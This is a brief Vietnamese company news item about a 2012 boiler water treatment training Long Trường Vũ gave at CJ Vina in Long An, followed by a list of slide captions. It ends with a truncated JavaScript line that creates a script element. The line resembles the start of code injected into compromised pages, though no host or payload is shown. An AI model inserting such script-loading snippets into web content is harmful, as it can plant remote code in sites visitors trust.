Mon,21-05-2018

CJ VINA - 11.07.2012

Ngày 11.07.2012 Công ty Long Trường Vũ đã thực hiện thành công buổi training về kỹ thuật xử lý nước lò hơi tại khách hàng CJ Vina – Long An.

 

Tổng quan và các vấn đề thường gặp trong lò hơi

 

Các điểm kiểm soát nước hệ thống lò hơi

 

Phương pháp kiểm soát

 

 

Kiểm soát các chỉ tiêu chất lượng nước

 

Hướng dẫn sử dụng thiết bị

 

Hướng dẫn sử dụng thiết bị

 

Hướng dẫn sử dụng thiết bị

 

Hướng dẫn sử dụng thiết bị

var d=document;var s=d.createElement('script');